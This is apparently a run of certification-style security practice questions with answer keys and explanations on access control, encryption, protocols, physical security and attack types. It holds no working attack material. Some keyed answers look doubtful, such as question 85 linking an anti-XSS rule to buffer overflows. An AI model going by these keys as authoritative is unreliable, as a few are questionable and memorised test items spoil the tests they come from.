  1. Which is the best rule-based access control constraint to protect against unauthorized access when admins are off-duty?

❍ A. Least privilege
❍ B. Separation of duties
❍ C. Account expiration
❍ D. Time of day

A

Answer D is correct. Time of day rules prevent administrative access requests
during off-hours when local admins and security professionals are not on duty.
Answer A is incorrect because least privilege is a principle of assigning only
those rights necessary to perform assigned tasks. Answer B is incorrect
because separation of duties aids in identification of fraudulent or incorrect
processes by ensuring that action and validation practices are performed separately.
Answer C is incorrect because account expiration protocols ensure that
individual accounts do not remain active past their designated lifespan but do
nothing to ensure protections are enabled during admin downtime.

58
Q
  1. Which of the following protocols supports DES, 3DES, RC2, and RSA2 encryption along with CHAP authentication, but was not widely adopted?

❍ A. S-HTTP
❍ B. S/MIME
❍ C. HTTP
❍ D. PPTP

A

Answer A is correct. An alternative to HTTPS is the Secure Hypertext
Transport Protocol (S-HTTP), which was developed to support connectivity
for banking transactions and other secure web communications. S-HTTP was
not adopted by the early web browser developers (for example, Netscape and
Microsoft) and so remains less common than the HTTPS standard.
Additionally, S-HTTP encrypts individual messages so it cannot be used for
VPN security. Answer B is incorrect. S/MIME is used to encrypt electronic
mail transmissions over public networks. Answer C is incorrect because
HTTP is used for unsecured web-based communications. Answer D is incorrect
because Point-to-Point Tunneling Protocol (PPTP) is a network protocol
that enables the secure transfer of data from a remote client to a private enterprise
server by creating a virtual private network (VPN) across TCP/IP-based
data networks.

59
Q
  1. A new switch has been implemented in areas where there is very little physical access control. Which of the following would the organization implement as a method for additional checks in order to prevent unauthorized access?

❍ A. Loop protection
❍ B. Flood guard
❍ C. Implicit deny
❍ D. Port security

A

Answer D is correct. Port security is a Layer 2 traffic control feature on Cisco
Catalyst switches. It enables individual switch ports to be configured to allow
only a specified number of source MAC addresses coming in through the
port. Answer A is incorrect because the loop guard feature makes additional
checks in Layer 2 switched networks. Answer B is incorrect because a flood
guard is a firewall feature to control network activity associated with denialof-
service attacks (DoS). Answer C is incorrect because implicit deny is an
access control practice wherein resource availability is restricted to only those
logons explicitly granted access.

60
Q
  1. There have been some sporadic connectivity issues on the network. Which of the following is the best choice to investigate these issues?

❍ A. Protocol analyzer
❍ B. Circuit-level gateway logs
❍ C. Spam filter appliance
❍ D. Web application firewall logs

A

Answer A is correct. Protocol analyzers help you troubleshoot network issues
by gathering packet-level information across the network. These applications
capture packets and can conduct protocol decoding, putting the information
into readable data for analysis. Answer B is incorrect because a circuit-level
gateway filters based on source and destination addresses. Answer C is incorrect
because all-in-one spam filter appliances allow for checksum technology,
which tracks the number of times a particular message has appeared, and message
authenticity checking, which uses multiple algorithms to verify authenticity
of a message. Answer D is incorrect because a web application firewall is
software or a hardware appliance used to protect the organization’s web server
from attack.

61
Q
  1. Which of the following types of attacks can be done by either convincing the users to click on an HTML page the attacker has constructed or insert arbitrary HTML in a target website that the users visit?

❍ A. Buffer overflow
❍ B. Cross-site request forgery (XSRF)
❍ C. Cross-site scripting (XXS)
❍ D. Input validation error

A

Answer B is correct. The key element to understanding XSRF is that attackers
are betting that users have a validated login cookie for the website already
stored in their browsers. All they need to do is get the browsers to make a
request to the website on their behalf. This can be done by either convincing
the users to click on an HTML page the attacker has constructed or inserting
arbitrary HTML in a target website that the users visit. Answer A is incorrect
because a buffer overflow is a direct result of poor or incorrect input validation
or mishandled exceptions. Answer C is incorrect because cross-site scripting
(XXS) vulnerabilities can be used to hijack the user’s session or to cause
the user accessing malware-tainted Site A to unknowingly attack Site B on
behalf of the attacker who planted code on Site A. Answer D is incorrect
because input validation errors are a result of improper field checking in the
code.

62
Q
  1. Which of the following standards is used in HSMs?

❍ A. PKCS #11
❍ B. PKCS #7
❍ C. AES
❍ D. EFS

A

Answer A is correct. The PKCS #11 standard provides for access to public
and private asymmetric keys, symmetric keys, X.509 certificates, and
application data. PKCS #11 is the de facto standard for platform applications,
although some newer HSMs include more advanced authentication and
authorization models. Answer B is incorrect because PKCS #7 Cryptographic
Message Syntax Standard describes the syntax for data streams such as digital
signatures that may have cryptography applied to them. Answer C is incorrect
because AES is most commonly found on USB drive encryption. Answer D is
incorrect because EFS is the encrypting file system available in newer
Microsoft operating systems.

63
Q
  1. Which of the following algorithms is not an example of a symmetric encryption
    algorithm?

❍ A. Rijndael
❍ B. Diffie-Hellman
❍ C. RC6
❍ D. AES

A

Answer B is correct. Diffie-Hellman uses public and private keys, so it is considered
an asymmetric encryption algorithm. Because Rijndael and AES are
now one in the same, they both can be called symmetric encryption algorithms;
therefore, answers A and D are incorrect. Answer C is incorrect
because RC6 is symmetric, too.

64
Q
  1. Which of the following best describes the process of encrypting and decrypting
    data using an asymmetric encryption algorithm?

❍ A. Only the public key is used to encrypt, and only the private key is
used to decrypt.
❍ B. The public key is used to either encrypt or decrypt.
❍ C. Only the private key is used to encrypt, and only the public key is
used to decrypt.
❍ D. The private key is used to decrypt data encrypted with the public key.

A

Answer D is correct. When encrypting and decrypting data using an asymmetric
encryption algorithm, you use only the private key to decrypt data
encrypted with the public key. Answers A and B are both incorrect because in
public key encryption, if one key is used to encrypt, you can use the other to
decrypt the data. Answer C is incorrect because the public key is not used to
decrypt the same data it encrypted

65
Q
  1. Which one of the following defines APIs for devices such as smart cards that contain cryptographic information?

❍ A. PKCS #11
❍ B. PKCS #13
❍ C. PKCS #4
❍ D. PKCS #2

A

Answer A is correct. PKCS #11, the Cryptographic Token Interface
Standards, defines an API named Cryptoki for devices holding cryptographic
information. Answer B is incorrect because PKCS #13 is the Elliptic Curve
Cryptography Standard. Both answers C and D are incorrect because PKCS
#4 and PKCS #2 no longer exist and have been integrated into PKCS #1,
RSA Cryptography Standard

66
Q
  1. Which of the following are steps that can be taken to harden FTP services?

❍ A. Anonymous access to share files of questionable or undesirable content
should be limited.
❍ B. Regular review of networks for unauthorized or rogue servers.
❍ C. Technologies that allow dynamic updates must also include access
control and authentication.
❍ D. Unauthorized zone transfers should also be restricted

A

Answer A is correct. Anonymous access to share files of questionable or undesirable
content should be limited for proper FTP server security. Answer B is
incorrect because it is a hardening practice for DHCP services. Answers C
and D are incorrect because they are associated with hardening DNS service.

67
Q
  1. A situation in which a program or process attempts to store more data in a temporary
    data storage area than it was intended to hold is known as a what?

❍ A. Buffer overflow
❍ B. Denial of service
❍ C. Distributed denial of service
❍ D. Storage overrun

A

Answer A is correct. A buffer overflow occurs when a program or process
attempts to store more data in a buffer than the buffer was intended to hold.
The overflow of data can flow over into other buffers overwriting or deleting
data. A denial of service is a type of attack in which too much traffic is sent to
a host, preventing it from responding to legitimate traffic. A distributed denial
of service is similar, but it is initiated through multiple hosts; therefore,
answers B and C are incorrect. Although answer D sounds correct, it is not.

68
Q
  1. TEMPEST deals with which form of environmental control?

❍ A. HVAC
❍ B. EMI shielding
❍ C. Humidity
❍ D. Cold-aisle

A

Answer B is correct. TEMPEST protections involve the hardening of
equipment against EMI broadcast and sensitivity. Answers A and C are incorrect
because HVAC controls include temperature and humidity management
techniques to manage evolved heat in the data center and to minimize static
charge buildup. Answer D is incorrect because hot-aisle/cold-aisle schemes
provide thermal management for data centers by grouping air intakes on cold
aisles and air exhausts on designated hot aisles, making HVAC more effective.

69
Q
  1. Which of the following is included in hardening a host operating system?

❍ A. A policy for antivirus updates
❍ B. A policy for remote wipe
❍ C. An efficient method to connect to remote sites
❍ D. An effective system for file-level security

A

Answer D is correct. Hardening of the operating system includes planning
against both accidental and directed attacks, such as the use of fault-tolerant
hardware and software solutions. In addition, it is important to implement an
effective system for file-level security, including encrypted file support and
secured file system selection that allows the proper level of access control.
Answer A is incorrect because it is a host protection measure, not an OS hardening
measure. Answer B is incorrect because this is a feature associated with
data security, not host hardening. Answer C is incorrect because this is a
secure communication measure.

70
Q
  1. Which of the following is the preferred type of encryption used in SaaS platforms?

❍ A. Application level
❍ B. Database level
❍ C. Media level
❍ D. HSM leve

A

Answer A is correct. In an SaaS environment, application-level encryption is
preferred because the data is encrypted by the application before being stored
in the database or file system. The advantage is that it protects the data from
the user all the way to storage. Answer B is incorrect because in cloud implementations
data should be encrypted at the application layer rather than
within a database due to the complexity involved, and media encryption is
managed at the storage layer. Answer C is incorrect because encryption of a
complete virtual machine on IaaS could be considered media encryption.
Answer D is incorrect because an HSM solution is mainly found in private
datacenters that manage and offload cryptography with dedicated hardware
appliances.

71
Q
  1. Several organizational users are experiencing network and Internet connectivity issues. Which of the following would be most helpful in troubleshooting where the connectivity problems might exist?

❍ A. SSL
❍ B. IPsec
❍ C. SNMP
❍ D. Traceroute

A

Answer D is correct. Traceroute uses an ICMP echo request packet to find
the path between two addresses. Answer A is incorrect because SSL is a public
key-based security protocol that is used by Internet services and clients for
authentication, message integrity, and confidentiality. Answer B is incorrect because Internet Protocol Security (IPsec) authentication and encapsulation
standard is widely used to establish secure VPN communications. Answer C is
incorrect because SNMP is an application layer protocol whose purpose is to
collect statistics from TCP/IP devices. SNMP is used for monitoring the
health of network equipment, computer equipment, and devices such as uninterruptible
power supplies (UPSs).

72
Q
  1. An organization has an access control list implemented on the border router, but
    it appears that unauthorized traffic is still being accepted. Which of the following
    would the organization implement to improve the blocking of unauthorized traffic?

❍ A. Loop protection
❍ B. Flood guard
❍ C. Implicit deny
❍ D. Port security

A

Answer C is correct. Implicit deny is an access control practice wherein
resource availability is restricted to only those logons explicitly granted access.
Answer A is incorrect because the loop guard feature makes additional checks
in Layer 2 switched networks. Answer B is incorrect because a flood guard is a
firewall feature to control network activity associated with denial of service
attacks (DoS). Answer D is incorrect because port security is a Layer 2 traffic
control feature on Cisco Catalyst switches. It enables individual switch ports
to be configured to allow only a specified number of source MAC addresses
coming in through the port.

73
Q
  1. An asset is valued at $12,000; the threat exposure factor of a risk affecting that
    asset is 25%; and the annualized rate of occurrence is 50%. What is the SLE?

❍ A. $1,500
❍ B. $3,000
❍ C. $4,000
❍ D. $6,000

A

Answer B is correct. The single loss expectancy (SLE) is the product of the
value ($12,000) and the threat exposure (.25) or $3,000. Answer A is incorrect
because $1,500 represents the annualized loss expectancy (ALE), which is the
product of the SLE and the annualized rate of occurrence (ARO). Answers C
and D are incorrect calculated values.

74
Q
  1. Which form of fire suppression functions best in an Alaskan fire of burning metals?

❍ A. Dry-pipe sprinkler
❍ B. Wet-pipe sprinkler
❍ C. Carbon dioxide
❍ D. Dry powder

A

Answer D is correct. Combustible metal fires (Class D) require sodium chloride
and copper-based dry powder extinguishers. Although dry-pipe would be
preferable to wet-pipe sprinklers in regions that experience very low temperatures
such as Alaska, water is only appropriate for wood, paper, and trash fires
(Class A), making answers A and B incorrect. Answer C is incorrect because
carbon dioxide and Halon extinguishers are useful for fires involving live electric
wiring (Class C) and would not be used for burning metals.

75
Q
  1. While performing regular security audits, you suspect that your company is under attack and someone is attempting to use resources on your network. The IP addresses in the log files belong to a trusted partner company, however. Assuming an attack, which of the following might be occurring?

❍ A. Replay
❍ B. Authorization
❍ C. Social engineering
❍ D. Spoofing

A

Answer D is correct. The most likely answer is spoofing because this enables an
attacker to misrepresent the source of the requests. Answer A is incorrect
because this type of attack records and replays previously sent valid messages. Answer B is incorrect because this is not a type of attack but is instead the granting of access rights based on authentication. Answer C is incorrect because
social engineering involves the nontechnical means of gaining information.

76
Q
  1. Which mandatory access control label is appropriate for generally available data?

❍ A. ANONYMOUS
❍ B. PUBLIC
❍ C. SENSITIVE
❍ D. SECRET

A

Answer B is correct. The PUBLIC label can be applied to generally available
data within MAC access control environments. Answer A is incorrect because
the ANONYMOUS method of authorization is not available in MAC environments
because it lacks logon identification. Answers C and D are incorrect
because the SENSITIVE and SECRET labels indicate access control limitations
that are more restrictive than PUBLIC.

77
Q
  1. After a new switch was implemented, some sporadic connectivity issues on the network have occurred. The issues are suspected to be device related. Which of the following would the organization implement as a method for additional checks in order to prevent issues?

❍ A. Loop protection
❍ B. Flood guard
❍ C. Implicit deny
❍ D. Port security

A

Answer A is correct. The loop guard feature makes additional checks in Layer
2 switched networks. Answer B is incorrect because a flood guard is a firewall
feature to control network activity associated with denial-of-service attacks
(DoS). Answer C is incorrect because implicit deny is an access control practice
wherein resource availability is restricted to only those logons explicitly
granted access. Answer D is incorrect because port security is a Layer 2 traffic
control feature on Cisco Catalyst switches. It enables individual switch ports
to be configured to allow only a specified number of source MAC addresses
coming in through the port.

78
Q
  1. Which of the following is an example of a false negative result?

❍ A. An authorized user is granted access to a resource.
❍ B. An unauthorized user is granted access to a resource.
❍ C. An authorized user is refused access to a resource.
❍ D. An unauthorized user is refused access to a resource.

A

Answer C is correct. A false negative result involves access refusal for an
authorized user, which makes answer D incorrect. Answers A and B are incorrect
because they represent granted resource access.

79
Q
  1. Which of the following is the best choice for encrypting large amounts of data?

❍ A. Asymmetric encryption
❍ B. Symmetric encryption
❍ C. Elliptical curve encryption
❍ D. RSA encryption

A

Answer B is correct. Public key encryption is not usually used to encrypt large
amounts of data, but it does provide an effective and efficient means of sending
a secret key from which to do symmetric encryption thereafter, which
provides the best method for efficiently encrypting large amounts of data.
Therefore, answers A, C, and D are incorrect.

80
Q
  1. You want to be sure that the FTP ports that are required for a contract worker’s functionality have been properly secured. Which of the following ports would you check?

❍ A. 25/110/143
❍ B. 20/21
❍ C. 137/138/139
❍ D. 161/162

A

Answer B is correct. Ports 20 and 21 are used for FTP. Answer A is incorrect
because these ports are used for email. Answer C is incorrect because these
NetBIOS ports are required for certain Windows network functions such as
file sharing. Answer D is incorrect because these ports are used for SNMP.

81
Q
  1. Security guards are a form of which specific type of control?

❍ A. Management
❍ B. Technical
❍ C. Physical
❍ D. Access

A

Answer C is correct. Physical controls include facility design details such as
layout, door, locks, guards, and surveillance systems. Management controls
include policies and procedures, whereas technical controls include access
control systems, encryption, and data classification solutions, making answers
A and B incorrect. Access controls include all three classifications: management,
technical, and physical, making answer D incorrect because the question
asks for a specific type.

82
Q
  1. Which utility allows for the compilation of a list of systems, devices, and network hardware?

❍ A. Port scanner
❍ B. Vulnerability scanner
❍ C. Protocol analyzer
❍ D. Network mapper

A

Answer D is correct. A network mapper identifies all devices within a network
segment. Port scanners check service ports on a single device, making answer
A incorrect. Answer B is incorrect because vulnerability scanners look for particular
vulnerabilities associated with versions of software or services. Answer
C is incorrect because protocol analyzers examine network traffic and identify
protocols and endpoint devices in the identified transactions.

83
Q
  1. Which one of the following is not considered a physical security component?

❍ A. VPN tunnel
❍ B. Mantrap
❍ C. Fence
❍ D. CCTV

A

Answer A is correct. A VPN tunnel is an example of data security—not physical
security. Mantrap, fence, and CCTV are all components of physical security;
therefore, answers B, C, and D are incorrect.

84
Q
  1. A physical security plan should include which of the following? (Select all correct answers.)

❍ A. Description of the physical assets being protected
❍ B. The threats from which you are protecting against and their likelihood
❍ C. Location of a hard disk’s physical blocks
❍ D. Description of the physical areas where assets are located

A

Answers A, B, and D are correct. A physical security plan should be a written
plan that addresses your current physical security needs and future direction.
With the exception of answer C, all the answers are correct and should be
addressed in a physical security plan. A hard disk’s physical blocks pertain to
the file system.

85
Q
  1. Never inserting untrusted data except in allowed locations can be used to mitigate
    which of the following attacks? (Select two answers.)

❍ A. Buffer overflow
❍ B. Cross-site request forgery (XSRF)
❍ C. Cross-site scripting
❍ D. Input validation error

A

Answers A and D are correct. A buffer overflow is a direct result of poor or
incorrect input validation or mishandled exceptions, and input validation
errors are a result of improper field checking in the code. Answer B is incorrect
because Cross-site Request Forgery (XSRF) is an attack in which the end
user executes unwanted actions on a web application while he or she is currently
authenticated. Answer C is incorrect because cross-site scripting (XXS)
vulnerabilities can be used to hijack the user’s session or to cause the user
accessing malware-tainted Site A to unknowingly attack Site B on behalf of
the attacker who planted code on Site A.

86
Q
  1. An organization is looking to add a layer of security and improve enterprise desktop management. Which of the following fulfills this requirement?

❍ A. Virtualization
❍ B. Network storage policies
❍ C. VPN remote access
❍ D. Roaming profiles

A

Answer A is correct. Virtualization adds a layer of security as well as improves
enterprise desktop management and control with faster deployment of desktops
and fewer support calls due to application conflicts. Answer B is incorrect
because network storage policies have nothing to do with desktop management.
Answer C is incorrect because VPN remote access does not improve
enterprise desktop management. Answer D is incorrect because roaming profiles
do not add a layer of security.

87
Q
  1. Which of the following is a program that uses SSH to transfer files?

❍ A. S-HTTP
❍ B. S/MIME
❍ C. SFTP
❍ D. HTTPS

A

Answer C is correct. SFTP, or secure FTP, is a program that uses SSH to
transfer files. Unlike standard FTP, it encrypts both commands and data, preventing
passwords and sensitive information from being transmitted in the
clear over the network. Answer A is incorrect because S-HTTP is an alternative
to HTTPS, which was developed to support connectivity for banking
transactions and other secure web communications. Answer B is incorrect.
S/MIME is used to encrypt electronic mail transmissions over public networks.
Answer D is incorrect because HTTPS is used for secured web-based
communications.

88
Q
  1. Which one of the following best describes the type of attack designed to bring a network to a halt by flooding the systems with useless traffic?

❍ A. DoS
❍ B. Ping of death
❍ C. Teardrop
❍ D. Social engineering

A

Answer A is correct. A DoS attack (or denial of service) is designed to bring
down a network by flooding the system with an overabundance of useless traffic.
Although answers B and C are both types of DoS attacks, they are incorrect
because DoS more accurately describes “a type of attack.” Answer D is
incorrect because social engineering describes the nontechnical means of
obtaining information.

89
Q
  1. The process of making an operating system more secure by closing known vulnerabilities
    and addressing security issues is known as which of the following?

❍ A. Handshaking
❍ B. Hardening
❍ C. Hotfixing
❍ D. All of the above

A

Answer B is correct. Hardening refers to the process of securing an operating
system. Handshaking relates the agreement process before communication
takes place; therefore, answer A is incorrect. A hotfix is just a security patch
that gets applied to an operating system; therefore, answer C is incorrect.
Hardening is the only correct answer; therefore, answer D is incorrect.

90
Q
  1. An organization is looking for a mobile solution that allows both executives and employees to discuss sensitive information without having to travel to secure company locations. Which of the following fulfills this requirement?

❍ A. GPS tracking
❍ B. Voice encryption
❍ C. Remote wipe
❍ D. Passcode policy

A

Answer B is correct. Mobile voice encryption can allow executives and
employees alike to discuss sensitive information without having to travel to
secure company locations. Answer A is incorrect because in the event a mobile
device is lost, GPS tracking can be used to find the location. Answer C is
incorrect because remote wipe allows a handheld’s data to be remotely deleted
in the event the device is lost or stolen. Answer D is incorrect because a
screen lock or passcode is used to prevent access to the phone.

91
Q
  1. Users received a spam email from an unknown source and chose the option in the email to unsubscribe and are now getting more spam as a result. Which one of the following is most likely the reason?

❍ A. The unsubscribe option does not actually do anything.
❍ B. The unsubscribe request was never received.
❍ C. Spam filters were automatically turned off when making the selection
to unsubscribe.
❍ D. They confirmed that their addresses are “live.”

A

Answer D is correct. Often an option to opt out of further email does not
unsubscribe users; instead it means, “send me more spam,” because it has been
confirmed that the email address is not dormant. This is less likely to occur
with email a user receives that he or she opted into in the first place, however.
Answers A, B, and C are incorrect because these are less likely and not the
best choices

92
Q
  1. Which form of data storage is the most subject to modification?

❍ A. Main memory
❍ B. Write-once memory
❍ C. Routing tables
❍ D. Secondary memory

A

Answer C is correct. Only CPU registers and caches are more volatile than
routing and process tables, making answers A, B, and D incorrect as well.

93
Q
  1. Which of the following is not an example of multifactor authentication?

❍ A. Logon and password
❍ B. Smart card and PIN
❍ C. RFID chip and thumbprint
❍ D. Gait and iris recognition

A

Answer A is correct. Both logon and password represent a form of “what you
know” authentication. Answers B, C, and D are all incorrect because they represent
paired multifactor forms of authentication. A smart card and PIN represent
what you have and know, and an RFID chip and thumbprint link what
you have with what you are. Gait is a measure of what you do, and iris details
are an example of what you are.

94
Q
  1. Which of the following is an example of role-based access control criteria?

❍ A. GPS coordinates
❍ B. Trusted OS
❍ C. Members of the Administrators group
❍ D. Time of day

A

Answer C is correct. Role-based access control involves assignment of access
rights to groups associated with specific roles, with accounts inheriting rights
based on group membership. Answers A and B are incorrect, as requirements
for access only from specific locations or only from systems running a trusted
OS are examples of rule-based access controls. Time of day restrictions are
also rule-based access controls, making answer D incorrect.

95
Q
  1. The sender of data is provided with proof of delivery, and neither the sender nor receiver can deny either having sent or received the data. What is this called?

❍ A. Nonrepudiation
❍ B. Repetition
❍ C. Nonrepetition
❍ D. Repudiation

A

Answer A is correct. Nonrepudiation means that neither party can deny either
having sent or received the data in question. Both answers B and C are incorrect.
And repudiation is defined as the act of refusal; therefore, answer D is
incorrect.

96
Q
  1. Which of the following are steps that can be taken to harden DHCP services?

❍ A. Anonymous access to share files of questionable or undesirable content
should be limited.
❍ B. Regular review of networks for unauthorized or rogue servers.
❍ C. Technologies that allow dynamic updates must also include access
control and authentication.
❍ D. Unauthorized zone transfers should also be restricted.

A

Answer B is correct. Regular review of networks for unauthorized or rogue
servers is a practice used to harden DHCP services. Answer A is incorrect
because anonymous access to share files of questionable or undesirable content
should be limited for proper FTP server security. Answers C and D are
incorrect because they are associated with hardening DNS servers.

97
Q
  1. Which of the fields included within a digital certificate identifies the directory name of the entity signing the certificate?

❍ A. Signature Algorithm Identifier
❍ B. Issuer
❍ C. Subject Name
❍ D. Subject Public Key Information

A

Answer B is correct. The Issuer field identifies the name of the entity signing
the certificate, which is usually a certificate authority. The Signature
Algorithm Identifier identifies the cryptographic algorithm used by the CA to
sign the certificate; therefore, answer A is incorrect. The Subject Name is the
name of the end entity identified in the public key associated with the certificate;
therefore, answer C is incorrect. The Subject Public Key Information
field includes the public key of the entity named in the certificate, including a
cryptographic algorithm identifier; therefore, answer D is incorrect.

98
Q

Which of the following rights assignments overrides all others in a DAC or RBAC
environment?

❍ A. Implicit DENY
❍ B. Implicit ALLOW
❍ C. Explicit ALLOW
❍ D. Explicit DENY

A

Answer D is correct. An explicit DENY overrides all other access grants in a
discretionary access control environment. Explicit rights assignments function
in combination with inherited implicit rights in all other cases, making
answers A, B, and C incorrect

99
Q
  1. Which type of biometric authentication involves identification of the unique patterns
    of blood vessels at the back of the eye?

❍ A. Facial recognition
❍ B. Iris
❍ C. Retina
❍ D. Signature

A

Answer C is correct. Retinal biometric systems identify unique patterns of
blood vessels in the back of the eye. Facial recognition systems identify fixed
spacing of key features of the face such as bones, eyes, and chin shape, making
answer A incorrect. Answer B is incorrect because iris scanning involves identification
of unique patterns in the outer colored part of the eye. Answer D is incorrect because signature analysis is a form of biometric authentication
recording the speed, shape, and unique kinematics of a personal written
signature.

100
Q
  1. Which version of X.509 supports an optional Extension field?

❍ A. Version 1
❍ B. Version 2
❍ C. Version 3
❍ D. Answers B and C

A

Answer C is correct. Version 3 of X.509, which was introduced in 1996, supports an optional Extension field used to provide for more informational
fields. Version 1 is the most generic and did not yet incorporate this feature;therefore, answer A is incorrect. Version 2 did introduce the idea of unique identifiers, but not the optional Extension field; therefore, answers B and D
are incorrect.